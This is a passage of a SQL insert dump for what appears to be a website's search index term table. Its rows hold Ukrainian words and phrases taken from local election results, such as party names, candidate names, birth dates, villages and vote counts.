29.05.1986','народився 29.05.1986',0,1,1.6667,'н000',1,'*'),(1626912,'народився 29.05.1986 р','народився 29.05.1986 р',0,1,1.7333,'н000',1,'*'),(1626913,'народився 29.08.1984','народився 29.08.1984',0,1,1.6667,'н000',1,'*'),(1626914,'народився 29.08.1984 р','народився 29.08.1984 р',0,1,1.7333,'н000',1,'*'),(1626915,'народилася 02.07.1970','народилася 02.07.1970',0,1,1.7,'н000',1,'*'),(1626916,'народилася 02.07.1970 р','народилася 02.07.1970 р',0,1,1.7667,'н000',1,'*'),(1626917,'народилася 05.08.1958','народилася 05.08.1958',0,1,1.7,'н000',1,'*'),(1626918,'народилася 05.08.1958 р','народилася 05.08.1958 р',0,1,1.7667,'н000',1,'*'),(1626919,'народилася 08.07.1973','народилася 08.07.1973',0,1,1.7,'н000',1,'*'),(1626920,'народилася 08.07.1973 р','народилася 08.07.1973 р',0,1,1.7667,'н000',1,'*'),(1626921,'народилася 08.11.1968','народилася 08.11.1968',0,1,1.7,'н000',1,'*'),(1626922,'народилася 08.11.1968 р','народилася 08.11.1968 р',0,1,1.7667,'н000',1,'*'),(1626923,'народилася 16.05.1967','народилася 16.05.1967',0,1,1.7,'н000',1,'*'),(1626924,'народилася 16.05.1967 р','народилася 16.05.1967 р',0,1,1.7667,'н000',1,'*'),(1626925,'народилася 17.02.1969','народилася 17.02.1969',0,1,1.7,'н000',1,'*'),(1626926,'народилася 17.02.1969 р','народилася 17.02.1969 р',0,1,1.7667,'н000',1,'*'),(1626927,'народилася 19.06.1975','народилася 19.06.1975',0,1,1.7,'н000',1,'*'),(1626928,'народилася 19.06.1975 р','народилася 19.06.1975 р',0,1,1.7667,'н000',1,'*'),(1626929,'народилася 20.06.1977','народилася 20.06.1977',0,1,1.7,'н000',1,'*'),(1626930,'народилася 20.06.1977 р','народилася 20.06.1977 р',0,1,1.7667,'н000',1,'*'),(1626931,'народилася 20.11.1967','народилася 20.11.1967',0,1,1.7,'н000',1,'*'),(1626932,'народилася 20.11.1967 р','народилася 20.11.1967 р',0,1,1.7667,'н000',1,'*'),(1626933,'народилася 26.06.1958','народилася 26.06.1958',0,1,1.7,'н000',1,'*'),(1626934,'народилася 26.06.1958 р','народилася 26.06.1958 р',0,1,1.7667,'н000',1,'*'),(1626935,'народилася 28.09.1971','народилася 28.09.1971',0,1,1.7,'н000',1,'*'),(1626936,'народилася 28.09.1971 р','народилася 28.09.1971 р',0,1,1.7667,'н000',1,'*'),(1626937,'народилася 31.08.1987','народилася 31.08.1987',0,1,1.7,'н000',1,'*'),(1626938,'народилася 31.08.1987 р','народилася 31.08.1987 р',0,1,1.7667,'н000',1,'*'),(1626939,'народу 4','народу 4',0,1,1.2667,'н000',1,'*'),(1626940,'народу 4 11.76','народу 4 11.76',0,1,1.4667,'н000',1,'*'),(1626941,'народу 896','народу 896',0,1,1.3333,'н000',1,'*'),(1626942,'народу 896 4','народу 896 4',0,1,1.4,'н000',1,'*'),(1626943,'народу перший','народу перший',0,1,1.4333,'н000',1,'*'),(1626944,'народу перший кандидат','народу перший кандидат',0,1,1.7333,'н000',1,'*'),(1626945,'насіканова марія','насіканова марія',0,1,1.5333,'н000',1,'*'),(1626946,'насіканова марія іванівна','насіканова марія іванівна',0,1,1.8333,'н000',1,'*'),(1626947,'насосної','насосної',0,0,0.5333,'н000',1,'*'),(1626948,'насосної станції','насосної станції',0,1,1.5333,'н000',1,'*'),(1626949,'насосної станції місце','насосної станції місце',0,1,1.7333,'н000',1,'*'),(1626950,'наталія юріївна','наталія юріївна',0,1,1.5,'н000',1,'*'),(1626951,'наталія юріївна громадянка','наталія юріївна громадянка',0,1,1.8667,'н000',1,'*'),(1626952,'національного','національного',0,0,0.8667,'н000',1,'*'),(1626953,'національного банку','національного банку',0,1,1.6333,'н000',1,'*'),(1626954,'національного банку україни','національного банку україни',0,1,1.9,'н000',1,'*'),(1626955,'начальник дробарно-сортувальної','начальник дробарно-сортувальної',0,1,2,'н000',1,'*'),(1626956,'начальник дробарно-сортувальної дільниці','начальник дробарно-сортувальної дільниці',0,1,2,'н000',1,'*'),(1626957,'начальник місце','начальник місце',0,1,1.5,'н000',1,'*'),(1626958,'начальник місце проживання','начальник місце проживання',0,1,1.8667,'н000',1,'*'),(1626959,'начальника','начальника',0,0,0.6667,'н000',1,'*'),(1626960,'начальника з','начальника з',0,1,1.4,'н000',1,'*'),(1626961,'начальника з гірничого','начальника з гірничого',0,1,1.7333,'н000',1,'*'),(1626962,'наш край 4472','наш край 4472',0,1,1.4333,'н000',1,'*'),(1626963,'наш край малинське','наш край малинське',0,1,1.6,'н000',1,'*'),(1626964,'наш край перший','наш край перший',0,1,1.5,'н000',1,'*'),(1626965,'наш край тов','наш край тов',0,1,1.4,'н000',1,'*'),(1626966,'не працює','не працює',0,1,1.3,'н000',1,'*'),(1626967,'не працює місце','не працює місце',0,1,1.5,'н000',1,'*'),(1626968,'нова','нова',0,0,0.2667,'н000',1,'*'),(1626969,'нова діброва','нова діброва',0,1,1.4,'н000',1,'*'),(1626970,'нова діброва коростенський','нова діброва коростенський',0,1,1.8667,'н000',1,'*'),(1626971,'об\'єднання батьківщина 1252','об батьківщина 1252',0,1,1.9,'о000',1,'*'),(1626972,'об\'єднання батьківщина 5','об батьківщина 5',0,1,1.8,'о000',1,'*'),(1626973,'об\'єднання батьківщина виконавчий','об батьківщина виконавчий',0,1,2,'о000',1,'*'),(1626974,'об\'єднання батьківщина перший','об батьківщина перший',0,1,1.9667,'о000',1,'*'),(1626975,'об\'єднання батьківщина фоп','об батьківщина фоп',0,1,1.8667,'о000',1,'*'),(1626976,'об\'єднання свобода','об свобода',0,1,1.6,'о000',1,'*'),(1626977,'об\'єднання свобода 154','об свобода 154',0,1,1.7333,'о000',1,'*'),(1626978,'обираються','обираються',0,0,0.6667,'о000',1,'*'),(1626979,'обираються на','обираються на',0,1,1.4333,'о000',1,'*'),(1626980,'обираються на відповідних','обираються на відповідних',0,1,1.8333,'о000',1,'*'),(1626981,'обл 100','обл 100',0,1,1.2333,'о000',1,'*'),(1626982,'обл 100 33,89','обл 100 33,89',0,1,1.4333,'о000',1,'*'),(1626983,'обл 106','обл 106',0,1,1.2333,'о000',1,'*'),(1626984,'обл 106 35,93','обл 106 35,93',0,1,1.4333,'о000',1,'*'),(1626985,'обл 111','обл 111',0,1,1.2333,'о000',1,'*'),(1626986,'обл 111 37,62','обл 111 37,62',0,1,1.4333,'о000',1,'*'),(1626987,'обл 123','обл 123',0,1,1.2333,'о000',1,'*'),(1626988,'обл 123 41,69','обл 123 41,69',0,1,1.4333,'о000',1,'*'),(1626989,'обл 132','обл 132',0,1,1.2333,'о000',1,'*'),(1626990,'обл 132 44,74','обл 132 44,74',0,1,1.4333,'о000',1,'*'),(1626991,'обл 163','обл 163',0,1,1.2333,'о000',1,'*'),(1626992,'обл 163 55,25','обл 163 55,25',0,1,1.4333,'о000',1,'*'),(1626993,'обл 164','обл 164',0,1,1.2333,'о000',1,'*'),(1626994,'обл 164 55,59','обл 164 55,59',0,1,1.4333,'о000',1,'*'),(1626995,'обл 20','обл 20',0,1,1.2,'о000',1,'*'),(1626996,'обл 20 6,77','обл 20 6,77',0,1,1.3667,'о000',1,'*'),(1626997,'обл 201','обл 201',0,1,1.2333,'о000',1,'*'),(1626998,'обл 201 68,13','обл 201 68,13',0,1,1.4333,'о000',1,'*'),(1626999,'обл 207','обл 207',0,1,1.2333,'о000',1,'*'),(1627000,'обл 207 70,16','обл 207 70,16',0,1,1.4333,'о000',1,'*'),(1627001,'обл 215','обл 215',0,1,1.2333,'о000',1,'*'),(1627002,'обл 215 72,88','обл 215 72,88',0,1,1.4333,'о000',1,'*'),(1627003,'обл 217','обл 217',0,1,1.2333,'о000',1,'*'),(1627004,'обл 217 73,55','обл 217 73,55',0,1,1.4333,'о000',1,'*'),(1627005,'обл 233','обл 233',0,1,1.2333,'о000',1,'*'),(1627006,'обл 233 78,98','обл 233 78,98',0,1,1.4333,'о000',1,'*'),(1627007,'обл 237','обл 237',0,1,1.2333,'о000',1,'*'),(1627008,'обл 237 80,33','обл 237 80,33',0,1,1.4333,'о000',1,'*'),(1627009,'обл 26','обл 26',0,1,1.2,'о000',1,'*'),(1627010,'обл 26 8,81','обл 26 8,81',0,1,1.3667,'о000',1,'*'),(1627011,'обл 33','обл 33',0,1,1.2,'о000',1,'*'),(1627012,'обл 33 11,18','обл 33 11,18',0,1,1.4,'о000',1,'*'),(1627013,'обл 37','обл 37',0,1,1.2,'о000',1,'*'),(1627014,'обл 37 12,54','обл 37 12,54',0,1,1.4,'о000',1,'*'),(1627015,'обл 39','обл 39',0,1,1.2,'о000',1,'*'),(1627016,'обл 39 13,22','обл 39 13,22',0,1,1.4,'о000',1,'*'),(1627017,'обл 46','обл 46',0,1,1.2,'о000',1,'*'),(1627018,'обл 46 15,59','обл 46 15,59',0,1,1.4,'о000',1,'*'),(1627019,'обл 48','обл 48',0,1,1.2,'о000',1,'*'),(1627020,'обл 48 16,27','обл 48 16,27',0,1,1.4,'о000',1,'*'),(1627021,'обл 527','обл 527',0,1,1.2333,'о000',1,'*'),(1627022,'обл 527 178,64','обл 527 178,64',0,1,1.4667,'о000',1,'*'),(1627023,'обл 59','обл 59',0,1,1.2,'о000',1,'*'),(1627024,'обл 59 20,00','обл 59 20,00',0,1,1.4,'о000',1,'*'),(1627025,'обл 61','обл 61',0,1,1.2,'о000',1,'*'),(1627026,'обл 61 20,67','обл 61 20,67',0,1,1.4,'о000',1,'*'),(1627027,'обл 67','обл 67',0,1,1.2,'о000',1,'*'),(1627028,'обл 67 22,71','обл 67 22,71',0,1,1.4,'о000',1,'*'),(1627029,'обл 97','обл 97',0,1,1.2,'о000',1,'*'),(1627030,'обл 97 32,88','обл 97 32,88',0,1,1.4,'о000',1,'*'),(1627031,'обл єбво','обл єбво',0,1,1.2667,'о000',1,'*'),(1627032,'обл єбво 1','обл єбво 1',0,1,1.3333,'о000',1,'*'),(1627033,'обраних депутатів відсоток','обраних депутатів відсоток',0,1,1.8667,'о000',1,'*'),(1627034,'обраних депутатів місцевої','обраних депутатів місцевої',0,1,1.8667,'о000',1,'*'),(1627035,'обрано','обрано',0,0,0.4,'о000',1,'*'),(1627036,'обрано політична','обрано політична',0,1,1.5333,'о000',1,'*'),(1627037,'обрано політична партія','обрано політична партія',0,1,1.7667,'о000',1,'*'),(1627038,'обраного депутата голосів','обраного депутата голосів',0,1,1.8333,'о000',1,'*'),(1627039,'округ в','округ в',0,1,1.2333,'о000',1,'*'),(1627040,'округ в якому','округ в якому',0,1,1.4333,'о000',1,'*'),(1627041,'округу','округу',0,0,0.4,'о000',1,'*'),(1627042,'округу інспектор','округу інспектор',0,1,1.5333,'о000',1,'*'),(1627043,'округу інспектор з','округу інспектор з',0,1,1.6,'о000',1,'*'),(1627044,'оксана романівна','оксана романівна',0,1,1.5333,'о000',1,'*'),(1627045,'оксана романівна громадянка','оксана романівна громадянка',0,1,1.9,'о000',1,'*'),(1627046,'олег васильович громадянин','олег васильович громадянин',0,1,1.8667,'о000',1,'*'),(1627047,'олега','олега',0,0,0.3333,'о000',1,'*'),(1627048,'олега ляшка','олега ляшка',0,1,1.3667,'о000',1,'*'),(1627049,'олега ляшка 190','олега ляшка 190',0,1,1.5,'о000',1,'*'),(1627050,'олексій','олексій',0,0,0.4667,'о000',1,'*'),(1627051,'олексій григорович','олексій григорович',0,1,1.6,'о000',1,'*'),(1627052,'олексій григорович громадянин','олексій григорович громадянин',0,1,1.9667,'о000',1,'*'),(1627053,'олександр васильович громадянин','олександр васильович громадянин',0,1,2,'о000',1,'*'),(1627054,'олександр григорович','олександр григорович',0,1,1.6667,'о000',1,'*'),(1627055,'олександр григорович громадянинукраїни','олександр григорович громадянинукраїни',0,1,2,'о000',1,'*'),(1627056,'олександрович','олександрович',0,0,0.8667,'о000',1,'*'),(1627057,'олександрович громадянин','олександрович громадянин',0,1,1.8,'о000',1,'*'),(1627058,'олександрович громадянин україни','олександрович громадянин україни',0,1,2,'о000',1,'*'),(1627059,'олеся','олеся',0,0,0.3333,'о000',1,'*'),(1627060,'олеся ростиславівна','олеся ростиславівна',0,1,1.6333,'о000',1,'*'),(1627061,'олеся ростиславівна громадянка','олеся ростиславівна громадянка',0,1,2,'о000',1,'*'),(1627062,'ольга василівна громадянка','ольга василівна громадянка',0,1,1.8667,'о000',1,'*'),(1627063,'ольга михайлівна','ольга михайлівна',0,1,1.5333,'о000',1,'*'),(1627064,'ольга михайлівна громадянка','ольга михайлівна громадянка',0,1,1.9,'о000',1,'*'),(1627065,'онпс','онпс',0,0,0.2667,'о000',1,'*'),(1627066,'онпс місце','онпс місце',0,1,1.3333,'о000',1,'*'),(1627067,'онпс місце проживання','онпс місце проживання',0,1,1.7,'о000',1,'*'),(1627068,'оператор','оператор',0,0,0.5333,'о000',1,'*'),(1627069,'оператор насосної','оператор насосної',0,1,1.5667,'о000',1,'*'),(1627070,'оператор насосної станції','оператор насосної станції',0,1,1.8333,'о000',1,'*'),(1627071,'опозиційна','опозиційна',0,0,0.6667,'о000',1,'*'),(1627072,'опозиційна платформа','опозиційна платформа',0,1,1.6667,'о000',1,'*'),(1627073,'опозиційна платформа за','опозиційна платформа за',0,1,1.7667,'о000',1,'*'),(1627074,'опозиція','опозиція',0,0,0.5333,'о000',1,'*'),(1627075,'опозиція 102','опозиція 102',0,1,1.4,'о000',1,'*'),(1627076,'опозиція 102 0','опозиція 102 0',0,1,1.4667,'о000',1,'*'),(1627077,'організацію','організацію',0,0,0.7333,'о000',1,'*'),(1627078,'організацію політичної','організацію політичної',0,1,1.7333,'о000',1,'*'),(1627079,'організацію політичної партії','організацію політичної партії',0,1,1.9667,'о000',1,'*'),(1627080,'осбб','осбб',0,0,0.2667,'о000',1,'*'),(1627081,'осбб дружня','осбб дружня',0,1,1.3667,'о000',1,'*'),(1627082,'осбб дружня оселя','осбб дружня оселя',0,1,1.5667,'о000',1,'*'),(1627083,'освіта вища член','освіта вища член',0,1,1.5333,'о000',1,'*'),(1627084,'оселя','оселя',0,0,0.3333,'о000',1,'*'),(1627085,'оселя голова','оселя голова',0,1,1.4,'о000',1,'*'),(1627086,'оселя голова місце','оселя голова місце',0,1,1.6,'о000',1,'*'),(1627087,'особа-підприємець','особа-підприємець',0,0,1,'о000',1,'*'),(1627088,'особа-підприємець місце','особа-підприємець місце',0,1,1.7667,'о000',1,'*'),(1627089,'особа-підприємець місце проживання','особа-підприємець місце проживання',0,1,2,'о000',1,'*'),(1627090,'отриманих','отриманих',0,0,0.6,'о000',1,'*'),(1627091,'отриманих депутатських','отриманих депутатських',0,1,1.7333,'о000',1,'*'),(1627092,'отриманих депутатських мандатів','отриманих депутатських мандатів',0,1,2,'о000',1,'*'),(1627093,'підприємство','підприємство',0,0,0.8,'п000',1,'*'),(1627094,'підприємство з','підприємство з',0,1,1.4667,'п000',1,'*'),(1627095,'підприємство з технічної','підприємство з технічної',0,1,1.8,'п000',1,'*'),(1627096,'пальчевського','пальчевського',0,0,0.8667,'п000',1,'*'),(1627097,'пальчевського 4','пальчевського 4',0,1,1.5,'п000',1,'*'),(1627098,'пальчевського 4 11.76','пальчевського 4 11.76',0,1,1.7,'п000',1,'*'),(1627099,'пальчевського 778','пальчевського 778',0,1,1.5667,'п000',1,'*'),(1627100,'пальчевського 778 4','пальчевського 778 4',0,1,1.6333,'п000',1,'*'),(1627101,'пальчевського перший','пальчевського перший',0,1,1.6667,'п000',1,'*'),(1627102,'пальчевського перший кандидат','пальчевського перший кандидат',0,1,1.9667,'п000',1,'*'),(1627103,'папір-мал','папір-мал',0,0,0.6,'п000',1,'*'),(1627104,'папір-мал директор','папір-мал директор',0,1,1.6,'п000',1,'*'),(1627105,'папір-мал директор місце','папір-мал директор місце',0,1,1.8,'п000',1,'*'),(1627106,'паперу національного','паперу національного',0,1,1.6667,'п000',1,'*'),(1627107,'паперу національного банку','паперу національного банку',0,1,1.8667,'п000',1,'*'),(1627108,'партії європейська','партії європейська',0,1,1.6,'п000',1,'*'),(1627109,'партії європейська солідарність','партії європейська солідарність',0,1,2,'п000',1,'*'),(1627110,'партії всеукраїнське','партії всеукраїнське',0,1,1.6667,'п000',1,'*'),(1627111,'партії всеукраїнське об\'єднання','партії всеукраїнське об',0,1,2,'п000',1,'*'),(1627112,'партії к-сть','партії к-сть',0,1,1.4,'п000',1,'*'),(1627113,'партії к-сть отриманих','партії к-сть отриманих',0,1,1.7333,'п000',1,'*'),(1627114,'партії наш','партії наш',0,1,1.3333,'п000',1,'*'),(1627115,'партії наш край','партії наш край',0,1,1.5,'п000',1,'*'),(1627116,'партія голос','партія голос',0,1,1.4,'п000',1,'*'),(1627117,'партія голос 186','партія голос 186',0,1,1.5333,'п000',1,'*'),(1627118,'партія громадсько-політична','партія громадсько-політична',0,1,1.9,'п000',1,'*'),(1627119,'партія громадсько-політична платформа','партія громадсько-політична платформа',0,1,2,'п000',1,'*'),(1627120,'партія за','партія за',0,1,1.3,'п000',1,'*'),(1627121,'партія за майбутнє','партія за майбутнє',0,1,1.6,'п000',1,'*'),(1627122,'партія ліва','партія ліва',0,1,1.3667,'п000',1,'*'),(1627123,'партія ліва опозиція','партія ліва опозиція',0,1,1.6667,'п000',1,'*'),(1627124,'партія олега','партія олега',0,1,1.4,'п000',1,'*'),(1627125,'партія олега ляшка','партія олега ляшка',0,1,1.6,'п000',1,'*'),(1627126,'партія опозиційна','партія опозиційна',0,1,1.5667,'п000',1,'*'),(1627127,'партія опозиційна платформа','партія опозиційна платформа',0,1,1.9,'п000',1,'*'),(1627128,'партія перемога','партія перемога',0,1,1.5,'п000',1,'*'),(1627129,'партія перемога пальчевського','партія перемога пальчевського',0,1,1.9667,'п000',1,'*'),(1627130,'партія пропозиція','партія пропозиція',0,1,1.5667,'п000',1,'*'),(1627131,'партія пропозиція 461','партія пропозиція 461',0,1,1.7,'п000',1,'*'),(1627132,'партія радикальна','партія радикальна',0,1,1.5667,'п000',1,'*'),(1627133,'партія радикальна партія','партія радикальна партія',0,1,1.8,'п000',1,'*'),(1627134,'парфіненко','парфіненко',0,0,0.6667,'п000',1,'*'),(1627135,'парфіненко наталія','парфіненко наталія',0,1,1.6,'п000',1,'*'),(1627136,'парфіненко наталія юріївна','парфіненко наталія юріївна',0,1,1.8667,'п000',1,'*'),(1627137,'перемога','перемога',0,0,0.5333,'п000',2,'*'),(1627138,'перемога пальчевського','перемога пальчевського',0,1,1.7333,'п000',1,'*'),(1627139,'перемога пальчевського 4','перемога пальчевського 4',0,1,1.8,'п000',1,'*'),(1627140,'перемога пальчевського 778','перемога пальчевського 778',0,1,1.8667,'п000',1,'*'),(1627141,'перемога пальчевського перший','перемога пальчевського перший',0,1,1.9667,'п000',1,'*'),(1627142,'перший кандидат','перший кандидат',0,1,1.5,'п000',1,'*'),(1627143,'перший кандидат дмитренко','перший кандидат дмитренко',0,1,1.8333,'п000',1,'*'),(1627144,'перший кандидат насіканова','перший кандидат насіканова',0,1,1.8667,'п000',1,'*'),(1627145,'перший кандидат парфіненко','перший кандидат парфіненко',0,1,1.8667,'п000',1,'*'),(1627146,'перший кандидат рудченко','перший кандидат рудченко',0,1,1.8,'п000',1,'*'),(1627147,'перший кандидат шостак','перший кандидат шостак',0,1,1.7333,'п000',1,'*'),(1627148,'петро','петро',0,0,0.3333,'п000',1,'*'),(1627149,'петро петрович','петро петрович',0,1,1.4667,'п000',1,'*'),(1627150,'петро петрович громадянин','петро петрович громадянин',0,1,1.8333,'п000',1,'*'),(1627151,'петрович громадянин','петрович громадянин',0,1,1.6333,'п000',1,'*'),(1627152,'петрович громадянин україни','петрович громадянин україни',0,1,1.9,'п000',1,'*'),(1627153,'пиріжки','пиріжки',0,0,0.4667,'п000',1,'*'),(1627154,'пиріжки коростенський','пиріжки коростенський',0,1,1.7,'п000',1,'*'),(1627155,'пиріжки коростенський р-н','пиріжки коростенський р-н',0,1,1.8333,'п000',1,'*'),(1627156,'платформа','платформа',0,0,0.6,'п000',1,'*'),(1627157,'платформа за','платформа за',0,1,1.4,'п000',1,'*'),(1627158,'платформа за життя','платформа за життя',0,1,1.6,'п000',1,'*'),(1627159,'платформа надії','платформа надії',0,1,1.5,'п000',1,'*'),(1627160,'платформа надії савченко','платформа надії савченко',0,1,1.8,'п000',1,'*'),(1627161,'пмп','пмп',0,0,0.2,'п000',1,'*'),(1627162,'пмп полісся','пмп полісся',0,1,1.3667,'п000',1,'*'),(1627163,'пмп полісся генеральний','пмп полісся генеральний',0,1,1.7667,'п000',1,'*'),(1627164,'по батькові відомості','по батькові відомості',0,1,1.7,'п000',1,'*'),(1627165,'поданих','поданих',0,0,0.4667,'п000',1,'*'),(1627166,'поданих за','поданих за',0,1,1.3333,'п000',1,'*'),(1627167,'поданих за місцеву','поданих за місцеву',0,1,1.6,'п000',1,'*'),(1627168,'поліклініка','поліклініка',0,0,0.7333,'п000',1,'*'),(1627169,'поліклініка завідуюча','поліклініка завідуюча',0,1,1.7,'п000',1,'*'),(1627170,'поліклініка завідуюча місце','поліклініка завідуюча місце',0,1,1.9,'п000',1,'*'),(1627171,'полісся генеральний','полісся генеральний',0,1,1.6333,'п000',1,'*'),(1627172,'полісся генеральний директор','полісся генеральний директор',0,1,1.9333,'п000',1,'*'),(1627173,'поліського','поліського',0,0,0.6667,'п000',1,'*'),(1627174,'поліського округу','поліського округу',0,1,1.5667,'п000',1,'*'),(1627175,'поліського округу інспектор','поліського округу інспектор',0,1,1.9,'п000',1,'*'),(1627176,'політична партія голос','політична партія голос',0,1,1.7333,'п000',1,'*'),(1627177,'політична партія громадсько-політична','політична партія громадсько-політична',0,1,2,'п000',1,'*'),(1627178,'політична партія за','політична партія за',0,1,1.6333,'п000',1,'*'),(1627179,'політична партія ліва','політична партія ліва',0,1,1.7,'п000',1,'*'),(1627180,'політична партія опозиційна','політична партія опозиційна',0,1,1.9,'п000',1,'*'),(1627181,'політична партія перемога','політична партія перемога',0,1,1.8333,'п000',1,'*'),(1627182,'політична партія пропозиція','політична партія пропозиція',0,1,1.9,'п000',1,'*'),(1627183,'політична партія радикальна','політична партія радикальна',0,1,1.9,'п000',1,'*'),(1627184,'політичної партії європейська','політичної партії європейська',0,1,1.9667,'п000',1,'*'),(1627185,'політичної партії всеукраїнське','політичної партії всеукраїнське',0,1,2,'п000',1,'*'),(1627186,'політичної партії к-сть','політичної партії к-сть',0,1,1.7667,'п000',1,'*'),(1627187,'політичної партії наш','політичної партії наш',0,1,1.7,'п000',1,'*'),(1627188,'правління','правління',0,0,0.6,'п000',1,'*'),(1627189,'правління осбб','правління осбб',0,1,1.4667,'п000',1,'*'),(1627190,'правління осбб дружня','правління осбб дружня',0,1,1.7,'п000',1,'*'),(1627191,'працює','працює',0,0,0.4,'п000',1,'*'),(1627192,'працює місце','працює місце',0,1,1.4,'п000',1,'*'),(1627193,'працює місце проживання','працює місце проживання',0,1,1.7667,'п000',1,'*'),(1627194,'приходько','приходько',0,0,0.6,'п000',1,'*'),(1627195,'приходько ольга','приходько ольга',0,1,1.5,'п000',1,'*'),(1627196,'приходько ольга василівна','приходько ольга василівна',0,1,1.8333,'п000',1,'*'),(1627197,'про обраних','про обраних',0,1,1.3667,'п000',1,'*'),(1627198,'про обраних депутатів','про обраних депутатів',0,1,1.7,'п000',1,'*'),(1627199,'про результати','про результати',0,1,1.4667,'п000',1,'*'),(1627200,'про результати голосування','про результати голосування',0,1,1.8667,'п000',1,'*'),(1627201,'проживання м житомир','проживання м житомир',0,1,1.6667,'п000',1,'*'),(1627202,'проживання м коростень','проживання м коростень',0,1,1.7333,'п000',1,'*'),(1627203,'проживання с забране','проживання с забране',0,1,1.6667,'п000',1,'*'),(1627204,'проживання с любовичі','проживання с любовичі',0,1,1.7,'п000',1,'*'),(1627205,'проживання с нова','проживання с нова',0,1,1.5667,'п000',1,'*'),(1627206,'проживання с пиріжки','проживання с пиріжки',0,1,1.6667,'п000',1,'*'),(1627207,'проживання с українка','проживання с українка',0,1,1.7,'п000',1,'*'),(1627208,'проживання с федорівка','проживання с федорівка',0,1,1.7333,'п000',1,'*'),(1627209,'проживання смт','проживання смт',0,1,1.4667,'п000',1,'*'),(1627210,'проживання смт гранітне','проживання смт гранітне',0,1,1.7667,'п000',1,'*'),(1627211,'пропозиція','пропозиція',0,0,0.6667,'п000',1,'*'),(1627212,'пропозиція 461','пропозиція 461',0,1,1.4667,'п000',1,'*'),(1627213,'пропозиція 461 0','пропозиція 461 0',0,1,1.5333,'п000',1,'*'),(1627214,'професійно','професійно',0,0,0.6667,'п000',1,'*'),(1627215,'професійно технічний','професійно технічний',0,1,1.6667,'п000',1,'*'),(1627216,'професійно технічний ліцей','професійно технічний ліцей',0,1,1.8667,'п000',1,'*'),(1627217,'р-н малинська','р-н малинська',0,1,1.4333,'р000',1,'*'),(1627218,'р-н малинська міська','р-н малинська міська',0,1,1.6667,'р000',1,'*'),(1627219,'рада бухгалтер','рада бухгалтер',0,1,1.4667,'р000',1,'*'),(1627220,'рада бухгалтер місце','рада бухгалтер місце',0,1,1.6667,'р000',1,'*'),(1627221,'рада кількість','рада кількість',0,1,1.4667,'р000',1,'*'),(1627222,'рада кількість депутатів','рада кількість депутатів',0,1,1.8,'р000',1,'*'),(1627223,'рада малинського','рада малинського',0,1,1.5333,'р000',1,'*'),(1627224,'рада малинського району','рада малинського району',0,1,1.7667,'р000',1,'*'),(1627225,'ради 34','ради 34',0,1,1.2333,'р000',1,'*'),(1627226,'ради заступник','ради заступник',0,1,1.4667,'р000',1,'*'),(1627227,'ради заступник міського','ради заступник міського',0,1,1.7667,'р000',1,'*'),(1627228,'ради міський','ради міський',0,1,1.4,'р000',1,'*'),(1627229,'ради міський голова','ради міський голова',0,1,1.6333,'р000',1,'*'),(1627230,'ради назва','ради назва',0,1,1.3333,'р000',1,'*'),(1627231,'ради назва політичної','ради назва політичної',0,1,1.7,'р000',1,'*'),(1627232,'ради політична','ради політична',0,1,1.4667,'р000',1,'*'),(1627233,'ради політична партія','ради політична партія',0,1,1.7,'р000',1,'*'),(1627234,'ради які','ради які',0,1,1.2667,'р000',1,'*'),(1627235,'ради які обираються','ради які обираються',0,1,1.6333,'р000',1,'*'),(1627236,'радикальна','радикальна',0,0,0.6667,'р000',1,'*'),(1627237,'радикальна партія','радикальна партія',0,1,1.5667,'р000',1,'*'),(1627238,'радикальна партія олега','радикальна партія олега',0,1,1.7667,'р000',1,'*'),(1627239,'районне','районне',0,0,0.4667,'р000',1,'*'),(1627240,'районне комунальне','районне комунальне',0,1,1.6,'р000',1,'*'),(1627241,'районне комунальне підприємство','районне комунальне підприємство',0,1,2,'р000',1,'*'),(1627242,'району сільський','району сільський',0,1,1.5333,'р000',1,'*'),(1627243,'району сільський голова','району сільський голова',0,1,1.7667,'р000',1,'*'),(1627244,'райрада','райрада',0,0,0.4667,'р000',1,'*'),(1627245,'райрада керуючий','райрада керуючий',0,1,1.5333,'р000',1,'*'),(1627246,'райрада керуючий справами','райрада керуючий справами',0,1,1.8333,'р000',1,'*'),(1627247,'результати','результати',0,0,0.6667,'р000',2,'*'),(1627248,'результати голосування','результати голосування',0,1,1.7333,'р000',1,'*'),(1627249,'результати голосування назва','результати голосування назва',0,1,1.9333,'р000',1,'*'),(1627250,'романівна','романівна',0,0,0.6,'р000',1,'*'),(1627251,'романівна громадянка','романівна громадянка',0,1,1.6667,'р000',1,'*'),(1627252,'романівна громадянка україни','романівна громадянка україни',0,1,1.9333,'р000',1,'*'),(1627253,'ростиславівна','ростиславівна',0,0,0.8667,'р000',1,'*'),(1627254,'ростиславівна громадянка','ростиславівна громадянка',0,1,1.8,'р000',1,'*'),(1627255,'ростиславівна громадянка україни','ростиславівна громадянка україни',0,1,2,'р000',1,'*'),(1627256,'рудицька','рудицька',0,0,0.5333,'р000',1,'*'),(1627257,'рудицька олеся','рудицька олеся',0,1,1.4667,'р000',1,'*'),(1627258,'рудицька олеся ростиславівна','рудицька олеся ростиславівна',0,1,1.9333,'р000',1,'*'),(1627259,'рудченко','рудченко',0,0,0.5333,'р000',1,'*'),(1627260,'рудченко юрій','рудченко юрій',0,1,1.4333,'р000',1,'*'),(1627261,'рудченко юрій миколайович','рудченко юрій миколайович',0,1,1.8333,'р000',1,'*'),(1627262,'с забране','с забране',0,1,1.3,'с000',1,'*'),(1627263,'с забране коростенський','с забране коростенський',0,1,1.7667,'с000',1,'*'),(1627264,'с любовичі','с любовичі',0,1,1.3333,'с000',1,'*'),(1627265,'с любовичі коростенськийр-н','с любовичі коростенськийр-н',0,1,1.9,'с000',1,'*'),(1627266,'с нова','с нова',0,1,1.2,'с000',1,'*'),(1627267,'с нова діброва','с нова діброва',0,1,1.4667,'с000',1,'*'),(1627268,'с пиріжки','с пиріжки',0,1,1.3,'с000',1,'*'),(1627269,'с пиріжки коростенський','с пиріжки коростенський',0,1,1.7667,'с000',1,'*'),(1627270,'с українка','с українка',0,1,1.3333,'с000',1,'*'),(1627271,'с українка коростенський','с українка коростенський',0,1,1.8,'с000',1,'*'),(1627272,'с федорівка','с федорівка',0,1,1.3667,'с000',1,'*'),(1627273,'с федорівка малинський','с федорівка малинський',0,1,1.7333,'с000',1,'*'),(1627274,'сільська рада бухгалтер','сільська рада бухгалтер',0,1,1.7667,'с000',1,'*'),(1627275,'сільська рада малинського','сільська рада малинського',0,1,1.8333,'с000',1,'*'),(1627276,'сільський голова місце','сільський голова місце',0,1,1.7333,'с000',1,'*'),(1627277,'савченко','савченко',0,0,0.5333,'с000',1,'*'),(1627278,'савченко 94','савченко 94',0,1,1.3667,'с000',1,'*'),(1627279,'савченко 94 0','савченко 94 0',0,1,1.4333,'с000',1,'*'),(1627280,'савченко 